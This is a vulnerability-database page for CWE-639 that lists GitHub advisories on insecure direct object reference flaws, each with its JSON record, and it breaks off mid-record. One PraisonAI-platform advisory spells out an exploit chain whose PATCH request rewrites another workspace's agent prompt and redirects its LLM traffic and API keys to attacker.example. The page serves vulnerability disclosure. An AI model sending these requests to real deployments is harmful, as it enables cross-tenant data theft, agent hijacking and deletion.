CWE-639
AllowedAuthorization Bypass Through User-Controlled Key
Abstraction: Base · Status: Incomplete
The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.
3235 vulnerabilities reference this CWE, most recent first.
GHSA-7JXV-2XPM-95JX
Vulnerability from github – Published: 2022-05-24 19:16 – Updated: 2022-05-24 19:16ECOA BAS controller is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers with general user's privilege can remotely bypass authorization and access the hidden resources in the system and execute privileged functionalities.
{
"affected": [],
"aliases": [
"CVE-2021-41298"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-30T11:15:00Z",
"severity": "HIGH"
},
"details": "ECOA BAS controller is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers with general user\u0027s privilege can remotely bypass authorization and access the hidden resources in the system and execute privileged functionalities.",
"id": "GHSA-7jxv-2xpm-95jx",
"modified": "2022-05-24T19:16:13Z",
"published": "2022-05-24T19:16:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41298"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-5134-39f74-1.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-7M48-2X85-6WQ3
Vulnerability from github – Published: 2025-12-17 21:30 – Updated: 2025-12-19 21:30AVideo versions prior to 20.0 are vulnerable to an insecure direct object reference (IDOR) that allows any authenticated user to delete media files belonging to other users. The affected endpoint validates authentication but fails to verify ownership or edit permissions for the targeted video.
{
"affected": [],
"aliases": [
"CVE-2025-34435"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-17T20:15:53Z",
"severity": "HIGH"
},
"details": "AVideo versions prior to 20.0 are\u00a0vulnerable to an insecure direct object reference (IDOR) that allows any authenticated user to delete media files belonging to other users. The affected endpoint validates authentication but fails to verify ownership or edit permissions for the targeted video.",
"id": "GHSA-7m48-2x85-6wq3",
"modified": "2025-12-19T21:30:17Z",
"published": "2025-12-17T21:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34435"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/275a54268b"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056"
},
{
"type": "WEB",
"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-deletion"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-7MHV-MCWQ-RH85
Vulnerability from github – Published: 2022-07-21 00:00 – Updated: 2022-07-28 00:00The main MiCODUS MV720 GPS tracker web server has an authenticated insecure direct object reference vulnerability on endpoint and parameter device IDs, which accept arbitrary device IDs without further verification.
{
"affected": [],
"aliases": [
"CVE-2022-34150"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-20T16:15:00Z",
"severity": "MODERATE"
},
"details": "The main MiCODUS MV720 GPS tracker web server has an authenticated insecure direct object reference vulnerability on endpoint and parameter device IDs, which accept arbitrary device IDs without further verification.",
"id": "GHSA-7mhv-mcwq-rh85",
"modified": "2022-07-28T00:00:40Z",
"published": "2022-07-21T00:00:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-34150"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-200-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7MQ5-3VCF-V96V
Vulnerability from github – Published: 2026-06-11 12:32 – Updated: 2026-06-11 12:32GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.9 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to hide changes from merge request diff views due to improper input handling of file names.
{
"affected": [],
"aliases": [
"CVE-2026-6976"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-11T12:16:32Z",
"severity": "LOW"
},
"details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.9 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to hide changes from merge request diff views due to improper input handling of file names.",
"id": "GHSA-7mq5-3vcf-v96v",
"modified": "2026-06-11T12:32:45Z",
"published": "2026-06-11T12:32:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6976"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/3638136"
},
{
"type": "WEB",
"url": "https://about.gitlab.com/releases/2026/06/10/patch-release-gitlab-19-0-2-released"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/598165"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7P8G-6C6G-H9W7
Vulnerability from github – Published: 2026-06-05 16:28 – Updated: 2026-06-05 16:28Summary
Type: Insecure Direct Object Reference. The agent CRUD endpoints (GET / PATCH / DELETE /workspaces/{workspace_id}/agents/{agent_id}) gate access on require_workspace_member(workspace_id) only, then resolve agent_id through AgentService.get(agent_id) which is a primary-key lookup with no workspace constraint. A user who is a member of any workspace W1 can read, modify, or delete agents that belong to a different workspace W2 by guessing or harvesting an agent UUID and calling …/workspaces/W1/agents/<W2-agent-id>.
File: src/praisonai-platform/praisonai_platform/services/agent_service.py, lines 53-112; route handlers at src/praisonai-platform/praisonai_platform/api/routes/agents.py, lines 53-100.
Root cause: the route extracts workspace_id from the URL path and passes it to require_workspace_member for the membership check, but never threads it through to the service layer. AgentService.get calls session.get(Agent, agent_id), which is SELECT * FROM agents WHERE id = :agent_id with no AND workspace_id = :workspace_id. update and delete call self.get(agent_id) first and then mutate the returned row, inheriting the same gap. The MemberService is the one place in this codebase that does this correctly: it uses (workspace_id, user_id) as a composite key. The agent service simply forgot the second predicate, which is the textbook GHSA pattern for FastAPI services that treat routing parameters as decorative rather than authoritative.
Affected Code
File 1: src/praisonai-platform/praisonai_platform/services/agent_service.py, lines 53-55 and 105-112.
class AgentService:
...
async def get(self, agent_id: str) -> Optional[Agent]:
"""Get agent by ID."""
return await self._session.get(Agent, agent_id) # <-- BUG: no workspace_id predicate
async def update(
self,
agent_id: str,
name: Optional[str] = None,
...
) -> Optional[Agent]:
agent = await self.get(agent_id) # <-- inherits the same gap
if agent is None:
return None
...
return agent
async def delete(self, agent_id: str) -> bool:
agent = await self.get(agent_id) # <-- inherits the same gap
if agent is None:
return False
await self._session.delete(agent)
await self._session.flush()
return True
File 2: src/praisonai-platform/praisonai_platform/api/routes/agents.py, lines 53-101.
@router.get("/{agent_id}", response_model=AgentResponse)
async def get_agent(
workspace_id: str,
agent_id: str,
user: AuthIdentity = Depends(require_workspace_member), # only checks membership in workspace_id
session: AsyncSession = Depends(get_db),
):
svc = AgentService(session)
agent = await svc.get(agent_id) # <-- workspace_id never passed; svc.get returns any agent in the DB
if agent is None:
raise HTTPException(status_code=404, detail="Agent not found")
return AgentResponse.model_validate(agent)
The update_agent (lines 67-87) and delete_agent (lines 90-100) handlers exhibit the same pattern: they receive workspace_id via path parameter, use it solely for the membership gate, then call svc.update(agent_id, ...) / svc.delete(agent_id) without re-checking which workspace the agent actually belongs to.
Why it's wrong: the workspace_id segment in the route is treated as a UI hint (it gates "are you in some workspace W?") rather than an authoritative predicate (it should also gate "is the resource you are addressing actually inside W?"). A standard fix in FastAPI/SQLAlchemy services is to make the resource-lookup query include the workspace predicate and treat absence as 404, so that a foreign-workspace agent is indistinguishable from a non-existent one. The codebase already does this correctly in MemberService.get(workspace_id, user_id) and in *.list_for_workspace(workspace_id, ...) — the gap is specific to the single-row get / update / delete paths.
Exploit Chain
- Attacker registers two accounts (or recruits a single workspace member) and creates two workspaces:
W_attacker(attacker is a member) and obtains a knownagent_idfromW_target(a workspace the attacker is NOT a member of). Agent IDs are uuid4 strings (DB column default), but they leak through several side channels: user-list endpoints when an agent is mentioned in an issue body, the activity feed (activity.py:logrecordsentity_id=agent.id), webhook payloads, error messages, exported issue dumps, or simply by enumeration if the deployment does not rotate IDs frequently. State: attacker holds a target agent UUIDA_T. - Attacker authenticates and POSTs
Authorization: Bearer <attacker_jwt>toGET /workspaces/W_attacker/agents/A_T.require_workspace_member(W_attacker, attacker)returns the attacker's identity (they are a member ofW_attacker). State: control flow entersget_agentwithworkspace_id=W_attacker,agent_id=A_T. AgentService.get(A_T)runssession.get(Agent, "A_T"), which isSELECT * FROM agents WHERE id = 'A_T' LIMIT 1. The query has noworkspace_id = 'W_attacker'filter and returns the row — including itsinstructions,runtime_config,name,status,owner_id, etc — even thoughagent.workspace_id == 'W_target'. State: response body is the JSON-serialised target agent.- Attacker repeats with
PATCH /workspaces/W_attacker/agents/A_Tand a body of{"instructions": "<malicious system prompt>", "runtime_mode": "cloud", "runtime_config": {"api_base": "https://attacker.example/v1", "api_key": "<exfil>"}}.update_agentcallssvc.update(A_T, ...)which loads the target row and mutates the listed fields. State: the foreign workspace's agent now has attacker-chosen instructions and routes its LLM traffic throughattacker.example. - Attacker calls
DELETE /workspaces/W_attacker/agents/A_Tto wipe the target agent altogether, or repeats step 4 against every agent UUID they can harvest. State: target workspace's agent fleet is destroyed or backdoored.
Security Impact
Severity: sec-high. CVSS 8.1: network attack, low complexity, low privileges (any authenticated workspace member), no user interaction, scope unchanged (the auth context is the same component), high confidentiality (full agent record including instructions and runtime config), high integrity (arbitrary writes), low availability (DELETE wipes target agents).
Attacker capability: with one workspace-member token plus a harvested or guessed agent UUID, an attacker can read the target agent's instructions (often a proprietary system prompt), runtime_config (frequently contains LLM provider URLs and API keys when the deployment uses BYOK), owner_id, and status; rewrite the same fields to redirect the agent's LLM traffic to an attacker-controlled endpoint (proxy-and-log of every prompt, prompt injection of every response); flip status to error to silently break a competitor workspace's agent fleet; or delete the agents outright.
Preconditions: praisonai-platform is deployed multi-tenant (more than one workspace exists); the attacker has any membership token; the target agent's UUID is known or guessable (uuid4 randomness is large but UUIDs leak through activity feeds, webhook payloads, issue mentions, error messages, and operator screenshots).
Differential: source-inspection-verified end-to-end. The asymmetry between AgentService.get(agent_id) (no workspace check) and MemberService.get(workspace_id, user_id) (composite key check) is the smoking gun: the same author wrote both patterns, but only the member service is tenant-safe. With the suggested fix below applied, AgentService.get(workspace_id, agent_id) returns None when the agent belongs to a different workspace, the route handler returns 404, and the foreign workspace's data is indistinguishable from a missing record.
Suggested Fix
Make every single-row resource lookup take the workspace predicate. Treat foreign-workspace rows as 404, not 200, so the endpoint does not even confirm that the target ID exists.
--- a/src/praisonai-platform/praisonai_platform/services/agent_service.py
+++ b/src/praisonai-platform/praisonai_platform/services/agent_service.py
@@ -50,9 +50,12 @@ class AgentService:
await self._session.flush()
return agent
- async def get(self, agent_id: str) -> Optional[Agent]:
- """Get agent by ID."""
- return await self._session.get(Agent, agent_id)
+ async def get(self, workspace_id: str, agent_id: str) -> Optional[Agent]:
+ """Get agent by ID, scoped to a workspace."""
+ stmt = select(Agent).where(
+ Agent.id == agent_id, Agent.workspace_id == workspace_id
+ )
+ return (await self._session.execute(stmt)).scalar_one_or_none()
async def list_for_workspace(
self,
@@ -71,6 +74,7 @@ class AgentService:
async def update(
self,
+ workspace_id: str,
agent_id: str,
name: Optional[str] = None,
...
) -> Optional[Agent]:
- agent = await self.get(agent_id)
+ agent = await self.get(workspace_id, agent_id)
if agent is None:
return None
...
- async def delete(self, agent_id: str) -> bool:
+ async def delete(self, workspace_id: str, agent_id: str) -> bool:
- agent = await self.get(agent_id)
+ agent = await self.get(workspace_id, agent_id)
if agent is None:
return False
The route handlers in routes/agents.py then need to pass workspace_id into every svc.get/update/delete call. Repeat the pattern for IssueService, ProjectService, CommentService, and LabelService, which exhibit the same single-key lookup; those should be filed and fixed as separate advisories so each gets its own CVE.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "praisonai-platform"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47419"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-05T16:28:32Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\n**Type:** Insecure Direct Object Reference. The agent CRUD endpoints (`GET / PATCH / DELETE /workspaces/{workspace_id}/agents/{agent_id}`) gate access on `require_workspace_member(workspace_id)` only, then resolve `agent_id` through `AgentService.get(agent_id)` which is a primary-key lookup with no workspace constraint. A user who is a member of any workspace `W1` can read, modify, or delete agents that belong to a different workspace `W2` by guessing or harvesting an agent UUID and calling `\u2026/workspaces/W1/agents/\u003cW2-agent-id\u003e`.\n**File:** `src/praisonai-platform/praisonai_platform/services/agent_service.py`, lines 53-112; route handlers at `src/praisonai-platform/praisonai_platform/api/routes/agents.py`, lines 53-100.\n**Root cause:** the route extracts `workspace_id` from the URL path and passes it to `require_workspace_member` for the membership check, but never threads it through to the service layer. `AgentService.get` calls `session.get(Agent, agent_id)`, which is `SELECT * FROM agents WHERE id = :agent_id` with no `AND workspace_id = :workspace_id`. `update` and `delete` call `self.get(agent_id)` first and then mutate the returned row, inheriting the same gap. The `MemberService` is the one place in this codebase that does this correctly: it uses `(workspace_id, user_id)` as a composite key. The agent service simply forgot the second predicate, which is the textbook GHSA pattern for FastAPI services that treat routing parameters as decorative rather than authoritative.\n\n## Affected Code\n\n**File 1:** `src/praisonai-platform/praisonai_platform/services/agent_service.py`, lines 53-55 and 105-112.\n\n```python\nclass AgentService:\n ...\n\n async def get(self, agent_id: str) -\u003e Optional[Agent]:\n \"\"\"Get agent by ID.\"\"\"\n return await self._session.get(Agent, agent_id) # \u003c-- BUG: no workspace_id predicate\n\n async def update(\n self,\n agent_id: str,\n name: Optional[str] = None,\n ...\n ) -\u003e Optional[Agent]:\n agent = await self.get(agent_id) # \u003c-- inherits the same gap\n if agent is None:\n return None\n ...\n return agent\n\n async def delete(self, agent_id: str) -\u003e bool:\n agent = await self.get(agent_id) # \u003c-- inherits the same gap\n if agent is None:\n return False\n await self._session.delete(agent)\n await self._session.flush()\n return True\n```\n\n**File 2:** `src/praisonai-platform/praisonai_platform/api/routes/agents.py`, lines 53-101.\n\n```python\n@router.get(\"/{agent_id}\", response_model=AgentResponse)\nasync def get_agent(\n workspace_id: str,\n agent_id: str,\n user: AuthIdentity = Depends(require_workspace_member), # only checks membership in workspace_id\n session: AsyncSession = Depends(get_db),\n):\n svc = AgentService(session)\n agent = await svc.get(agent_id) # \u003c-- workspace_id never passed; svc.get returns any agent in the DB\n if agent is None:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n return AgentResponse.model_validate(agent)\n```\n\nThe `update_agent` (lines 67-87) and `delete_agent` (lines 90-100) handlers exhibit the same pattern: they receive `workspace_id` via path parameter, use it solely for the membership gate, then call `svc.update(agent_id, ...)` / `svc.delete(agent_id)` without re-checking which workspace the agent actually belongs to.\n\n**Why it\u0027s wrong:** the `workspace_id` segment in the route is treated as a UI hint (it gates \"are you in some workspace W?\") rather than an authoritative predicate (it should also gate \"is the resource you are addressing actually inside W?\"). A standard fix in FastAPI/SQLAlchemy services is to make the resource-lookup query include the workspace predicate and treat absence as 404, so that a foreign-workspace agent is indistinguishable from a non-existent one. The codebase already does this correctly in `MemberService.get(workspace_id, user_id)` and in `*.list_for_workspace(workspace_id, ...)` \u2014 the gap is specific to the single-row `get` / `update` / `delete` paths.\n\n## Exploit Chain\n\n1. Attacker registers two accounts (or recruits a single workspace member) and creates two workspaces: `W_attacker` (attacker is a member) and obtains a known `agent_id` from `W_target` (a workspace the attacker is NOT a member of). Agent IDs are uuid4 strings (DB column default), but they leak through several side channels: user-list endpoints when an agent is mentioned in an issue body, the activity feed (`activity.py:log` records `entity_id=agent.id`), webhook payloads, error messages, exported issue dumps, or simply by enumeration if the deployment does not rotate IDs frequently. State: attacker holds a target agent UUID `A_T`.\n2. Attacker authenticates and POSTs `Authorization: Bearer \u003cattacker_jwt\u003e` to `GET /workspaces/W_attacker/agents/A_T`. `require_workspace_member(W_attacker, attacker)` returns the attacker\u0027s identity (they are a member of `W_attacker`). State: control flow enters `get_agent` with `workspace_id=W_attacker`, `agent_id=A_T`.\n3. `AgentService.get(A_T)` runs `session.get(Agent, \"A_T\")`, which is `SELECT * FROM agents WHERE id = \u0027A_T\u0027 LIMIT 1`. The query has no `workspace_id = \u0027W_attacker\u0027` filter and returns the row \u2014 including its `instructions`, `runtime_config`, `name`, `status`, `owner_id`, etc \u2014 even though `agent.workspace_id == \u0027W_target\u0027`. State: response body is the JSON-serialised target agent.\n4. Attacker repeats with `PATCH /workspaces/W_attacker/agents/A_T` and a body of `{\"instructions\": \"\u003cmalicious system prompt\u003e\", \"runtime_mode\": \"cloud\", \"runtime_config\": {\"api_base\": \"https://attacker.example/v1\", \"api_key\": \"\u003cexfil\u003e\"}}`. `update_agent` calls `svc.update(A_T, ...)` which loads the target row and mutates the listed fields. State: the foreign workspace\u0027s agent now has attacker-chosen instructions and routes its LLM traffic through `attacker.example`.\n5. Attacker calls `DELETE /workspaces/W_attacker/agents/A_T` to wipe the target agent altogether, or repeats step 4 against every agent UUID they can harvest. State: target workspace\u0027s agent fleet is destroyed or backdoored.\n\n## Security Impact\n\n**Severity:** sec-high. CVSS 8.1: network attack, low complexity, low privileges (any authenticated workspace member), no user interaction, scope unchanged (the auth context is the same component), high confidentiality (full agent record including instructions and runtime config), high integrity (arbitrary writes), low availability (DELETE wipes target agents).\n**Attacker capability:** with one workspace-member token plus a harvested or guessed agent UUID, an attacker can read the target agent\u0027s `instructions` (often a proprietary system prompt), `runtime_config` (frequently contains LLM provider URLs and API keys when the deployment uses BYOK), `owner_id`, and status; rewrite the same fields to redirect the agent\u0027s LLM traffic to an attacker-controlled endpoint (proxy-and-log of every prompt, prompt injection of every response); flip `status` to `error` to silently break a competitor workspace\u0027s agent fleet; or delete the agents outright.\n**Preconditions:** `praisonai-platform` is deployed multi-tenant (more than one workspace exists); the attacker has any membership token; the target agent\u0027s UUID is known or guessable (uuid4 randomness is large but UUIDs leak through activity feeds, webhook payloads, issue mentions, error messages, and operator screenshots).\n**Differential:** source-inspection-verified end-to-end. The asymmetry between `AgentService.get(agent_id)` (no workspace check) and `MemberService.get(workspace_id, user_id)` (composite key check) is the smoking gun: the same author wrote both patterns, but only the member service is tenant-safe. With the suggested fix below applied, `AgentService.get(workspace_id, agent_id)` returns `None` when the agent belongs to a different workspace, the route handler returns 404, and the foreign workspace\u0027s data is indistinguishable from a missing record.\n\n## Suggested Fix\n\nMake every single-row resource lookup take the workspace predicate. Treat foreign-workspace rows as 404, not 200, so the endpoint does not even confirm that the target ID exists.\n\n```diff\n--- a/src/praisonai-platform/praisonai_platform/services/agent_service.py\n+++ b/src/praisonai-platform/praisonai_platform/services/agent_service.py\n@@ -50,9 +50,12 @@ class AgentService:\n await self._session.flush()\n return agent\n\n- async def get(self, agent_id: str) -\u003e Optional[Agent]:\n- \"\"\"Get agent by ID.\"\"\"\n- return await self._session.get(Agent, agent_id)\n+ async def get(self, workspace_id: str, agent_id: str) -\u003e Optional[Agent]:\n+ \"\"\"Get agent by ID, scoped to a workspace.\"\"\"\n+ stmt = select(Agent).where(\n+ Agent.id == agent_id, Agent.workspace_id == workspace_id\n+ )\n+ return (await self._session.execute(stmt)).scalar_one_or_none()\n\n async def list_for_workspace(\n self,\n@@ -71,6 +74,7 @@ class AgentService:\n\n async def update(\n self,\n+ workspace_id: str,\n agent_id: str,\n name: Optional[str] = None,\n ...\n ) -\u003e Optional[Agent]:\n- agent = await self.get(agent_id)\n+ agent = await self.get(workspace_id, agent_id)\n if agent is None:\n return None\n ...\n\n- async def delete(self, agent_id: str) -\u003e bool:\n+ async def delete(self, workspace_id: str, agent_id: str) -\u003e bool:\n- agent = await self.get(agent_id)\n+ agent = await self.get(workspace_id, agent_id)\n if agent is None:\n return False\n```\n\nThe route handlers in `routes/agents.py` then need to pass `workspace_id` into every `svc.get/update/delete` call. Repeat the pattern for `IssueService`, `ProjectService`, `CommentService`, and `LabelService`, which exhibit the same single-key lookup; those should be filed and fixed as separate advisories so each gets its own CVE.",
"id": "GHSA-7p8g-6c6g-h9w7",
"modified": "2026-06-05T16:28:32Z",
"published": "2026-06-05T16:28:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7p8g-6c6g-h9w7"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "praisonai-platform: Agent endpoints accept any agent_id without workspace ownership check, cross-workspace read/update/delete IDOR"
}
GHSA-7PCV-82QF-G35C
Vulnerability from github – Published: 2025-09-08 21:31 – Updated: 2025-09-08 21:31An Insecure Direct Object Reference (IDOR) in Envasadora H2O Eireli - Soda Cristal v40.20.4 allows authenticated attackers to access sensitive data for other users via a crafted HTTP request.
{
"affected": [],
"aliases": [
"CVE-2025-52389"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-08T20:15:35Z",
"severity": "HIGH"
},
"details": "An Insecure Direct Object Reference (IDOR) in Envasadora H2O Eireli - Soda Cristal v40.20.4 allows authenticated attackers to access sensitive data for other users via a crafted HTTP request.",
"id": "GHSA-7pcv-82qf-g35c",
"modified": "2025-09-08T21:31:00Z",
"published": "2025-09-08T21:31:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52389"
},
{
"type": "WEB",
"url": "https://github.com/ktr4ck3r/CVE-2025-52389"
},
{
"type": "WEB",
"url": "https://www.app.sodacristal.com.br"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7PF2-9C95-W332
Vulnerability from github – Published: 2026-05-26 13:30 – Updated: 2026-06-26 22:48Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate file ownership and access control, which allows an authenticated user to access and download files belonging to other users or teams via crafted Boards API requests using valid file IDs. Mattermost Advisory ID: MMSA-2026-00620.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost-server"
},
"ranges": [
{
"events": [
{
"introduced": "11.6.0"
},
{
"fixed": "11.6.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"11.6.0"
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost-server"
},
"ranges": [
{
"events": [
{
"introduced": "11.5.0"
},
{
"fixed": "11.5.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost-server"
},
"ranges": [
{
"events": [
{
"introduced": "11.4.0"
},
{
"fixed": "11.4.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost-server"
},
"ranges": [
{
"events": [
{
"introduced": "10.11.0"
},
{
"fixed": "10.11.15"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-3473"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T22:48:15Z",
"nvd_published_at": "2026-05-22T11:16:22Z",
"severity": "HIGH"
},
"details": "Mattermost versions 11.6.x \u003c= 11.6.0, 11.5.x \u003c= 11.5.3, 11.4.x \u003c= 11.4.4, 10.11.x \u003c= 10.11.14 fail to validate file ownership and access control, which allows an authenticated user to access and download files belonging to other users or teams via crafted Boards API requests using valid file IDs. Mattermost Advisory ID: MMSA-2026-00620.",
"id": "GHSA-7pf2-9c95-w332",
"modified": "2026-06-26T22:48:15Z",
"published": "2026-05-26T13:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3473"
},
{
"type": "PACKAGE",
"url": "https://github.com/mattermost/mattermost"
},
{
"type": "WEB",
"url": "https://mattermost.com/security-updates"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Mattermost doesn\u0027t validate file ownership and access control"
}
GHSA-7PFV-HR63-H7CW
Vulnerability from github – Published: 2026-03-09 19:45 – Updated: 2026-03-10 18:39Vulnerability
In modules/events/events_function.php, the event participation logic allows any user who can participate in an event to register OTHER users by manipulating the user_uuid GET parameter.
Line 47: $getUserUuid = admFuncVariableIsValid($_GET, 'user_uuid', 'uuid', ...)
Line 424: if ($event->possibleToParticipate() || $participants->isLeader($gCurrentUserId))
The condition uses || (OR), meaning if possibleToParticipate() returns true (event is open for participation), ANY user - not just leaders - can specify a different user_uuid and register/cancel participation for that user.
The code then operates on $user->getValue('usr_id') (the target user from user_uuid) rather than the current user.
Impact
- Register unwilling users for events (potential harassment/spam)
- Cancel other users' event participation
- Manipulate event participant counts and comments
- If events have participation limits, fill slots with unwanted registrations
Fix
For non-leader users, force user_uuid to the current user:
if (!$participants->isLeader($gCurrentUserId)) {
$getUserUuid = $gCurrentUser->getValue('usr_uuid');
}
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "admidio/admidio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.0.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30927"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-09T19:45:20Z",
"nvd_published_at": "2026-03-10T17:40:16Z",
"severity": "MODERATE"
},
"details": "## Vulnerability\n\nIn `modules/events/events_function.php`, the event participation logic allows any user who can participate in an event to register OTHER users by manipulating the `user_uuid` GET parameter.\n\nLine 47: `$getUserUuid = admFuncVariableIsValid($_GET, \u0027user_uuid\u0027, \u0027uuid\u0027, ...)`\nLine 424: `if ($event-\u003epossibleToParticipate() || $participants-\u003eisLeader($gCurrentUserId))`\n\nThe condition uses `||` (OR), meaning if `possibleToParticipate()` returns true (event is open for participation), ANY user - not just leaders - can specify a different `user_uuid` and register/cancel participation for that user.\n\nThe code then operates on `$user-\u003egetValue(\u0027usr_id\u0027)` (the target user from user_uuid) rather than the current user.\n\n## Impact\n- Register unwilling users for events (potential harassment/spam)\n- Cancel other users\u0027 event participation\n- Manipulate event participant counts and comments\n- If events have participation limits, fill slots with unwanted registrations\n\n## Fix\nFor non-leader users, force `user_uuid` to the current user:\n```php\nif (!$participants-\u003eisLeader($gCurrentUserId)) {\n $getUserUuid = $gCurrentUser-\u003egetValue(\u0027usr_uuid\u0027);\n}\n```",
"id": "GHSA-7pfv-hr63-h7cw",
"modified": "2026-03-10T18:39:33Z",
"published": "2026-03-09T19:45:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-7pfv-hr63-h7cw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30927"
},
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/issues/1985"
},
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/commit/e47f70cc3cbcdb39635fdbaaef02d19f604b8c3e"
},
{
"type": "PACKAGE",
"url": "https://github.com/Admidio/admidio"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Admidio: Event participation IDOR - non-leaders can register other users for events via user_uuid parameter"
}
GHSA-7Q39-R2HM-J8M9
Vulnerability from github – Published: 2022-05-24 16:53 – Updated: 2024-04-04 01:36The Recruitment module in Humanica Humatrix 7 1.0.0.681 and 1.0.0.203 allows remote attackers to access all candidates' information on the website via a modified selApp variable to personalData/resumeDetail.cfm. This includes personal information and other sensitive data.
{
"affected": [],
"aliases": [
